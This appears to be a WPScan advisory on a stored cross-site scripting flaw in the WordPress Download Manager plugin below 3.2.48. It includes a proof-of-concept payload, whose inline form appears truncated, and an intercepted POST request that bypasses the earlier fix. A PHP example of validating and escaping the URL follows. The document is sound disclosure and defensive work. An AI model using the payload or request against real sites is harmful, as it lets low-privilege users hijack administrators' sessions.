wpvulndb WPVDB-ID: 68D7E132-BB8C-4E83-B8AA-39067FBD638E
History: Jun 22, 2022 - 12:00 a.m.

Download Manager < 3.2.48 - Contributor+ Stored Cross-Site Scripting

2022-06-22 00:00:00
wpscan.com
13
download manager
cross-site scripting
unsanitised field
insufficient fix
contributor role
software

EPSS

0.002

Percentile

61.3%

The plugin does not sanitise and escape the 'Insert URL' field, which could allow users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks. Note: the attempted fixes made in 3.2.46 and 3.2.47 were found to be insufficient.

PoC

As a contributor, create/edit a download and put the following payload in the 'Insert URL' field: https://example.com/?a=">
Then click on the + button next to the field to save the URL, and click on the Submit for Review button.
The XSS will be triggered when editing the Download (for example when an admin reviews it).

In 3.2.47, the attack is still possible by adding a dummy URL, then intercepting the request made when saving the File Post and changing the file[files][] parameter to https://example.com/?a=">:

POST /wp-admin/post.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1887
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

_wpnonce=d1f3acca93&user_ID=1&action=editpost&originalaction=editpost&post_author=5&post_type=wpdmpro&original_post_status=publish&post_ID=6324&meta-box-order-nonce=0df29a4137&closedpostboxesnonce=ac72c29968&post_title=XSS+Contrib&samplepermalinknonce=db423b3cbb&content=&file%5Bfiles%5D%5B%5D=https%3a%2f%2fexample.com%2f%3fa%3d%22%3e%3csvg%2fonload%3dalert(%2fXSS%2f)%3e&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=06&jj=30&aa=2022&hh=22&mn=21&ss=28&hidden_mm=06&cur_mm=06&hidden_jj=30&cur_jj=30&hidden_aa=2022&cur_aa=2022&hidden_hh=22&cur_hh=22&hidden_mn=21&cur_mn=21&original_publish=Update&save=Update&tax_input%5Bwpdmcategory%5D%5B%5D=0&newwpdmcategory=New+Category+Name&newwpdmcategory_parent=-1&_ajax_nonce-add-wpdmcategory=67f0ab91c8&tax_input%5Bwpdmtag%5D=&newtag%5Bwpdmtag%5D=&_thumbnail_id=-1&excerpt=&metakeyselect=%23NONE%23&metakeyinput=&metavalue=&_ajax_nonce-add-meta=925d3f1564&advanced_view=1&comment_status=open&add_comment_nonce=d2ac60592b&_ajax_fetch_list_nonce=608563959a&post_name=xss-contrib&post_author_override=5&file%5Bversion%5D=&file%5Blink_label%5D=&file%5Bquota%5D=&file%5Bview_count%5D=1&file%5Bdownload_count%5D=&file%5Bpackage_size%5D=&file%5Baccess%5D%5B%5D=guest&file%5Bpage_template%5D=page-template-default.php&file%5Bterms_page%5D=&file%5Bterms_title%5D=&file%5Bterms_conditions%5D=&file%5Bterms_check_label%5D=&file%5Bpassword%5D=&file%5Bicon%5D=
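The fix the advisory calls for, validating the submitted URL on the server and escaping it on output, as an added PHP illustration that is not the plugin's own code. The 3.2.47 bypass above shows why the check has to run on the file[files][] value the server actually receives: any restriction applied only in the 'Insert URL' widget is skipped by editing the request. The script uses plain PHP (filter_var, htmlspecialchars) rather than WordPress's esc_url_raw() on save and esc_url()/esc_attr() on output so that it runs stand-alone; the function names and the constructed input (the decoded file[files][] value from the request above) are assumptions for the illustration.

```php
<?php
// Added illustration, not the plugin's code. Constructed input: the URL-encoded
// file[files][] value from the PoC request, decoded as the server would see it.
$raw = urldecode('https%3a%2f%2fexample.com%2f%3fa%3d%22%3e%3csvg%2fonload%3dalert(%2fXSS%2f)%3e');

// Vulnerable pattern: the stored value is interpolated into an attribute as-is,
// so the double quote in the value terminates value="..." and whatever follows
// is parsed by the browser as markup.
function render_unsafe(string $url): string {
    return '<input type="text" name="file[files][]" value="' . $url . '">';
}

// Hardened pattern, step 1: validate on save. Accept only http/https URLs and
// reject quotes, angle brackets and whitespace, which RFC 3986 never allows
// unencoded. Returns null when the submitted value must be discarded.
// (WordPress equivalent: esc_url_raw(), with your own scheme allow-list.)
function validate_url_on_save(string $url): ?string {
    $url = trim($url);
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        return null;
    }
    if (preg_match('/[\s"\'<>]/', $url)) {
        return null;
    }
    return $url;
}

// Hardened pattern, step 2: escape on output regardless of what was stored,
// because older rows may predate the validation.
// (WordPress equivalent: esc_attr() for attributes, esc_url() for href/src.)
function render_safe(?string $url): string {
    $url = $url ?? '';
    return '<input type="text" name="file[files][]" value="'
        . htmlspecialchars($url, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '">';
}

echo "Unsafe render:        " . render_unsafe($raw) . PHP_EOL;  // attribute breaks out
echo "Validated on save:    " . var_export(validate_url_on_save($raw), true) . PHP_EOL; // NULL
echo "Safe render of raw:   " . render_safe($raw) . PHP_EOL;    // quotes/brackets encoded
echo "Safe render of valid: " . render_safe(validate_url_on_save('https://example.com/file.zip')) . PHP_EOL;
```

Both layers are needed: validation on save keeps bad values out of the database, and escaping on output protects the admin editing screen even for rows stored before the fix. The regex rejection is deliberate because FILTER_VALIDATE_URL only rejects control and non-ASCII characters and will pass quotes and angle brackets in the query string.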

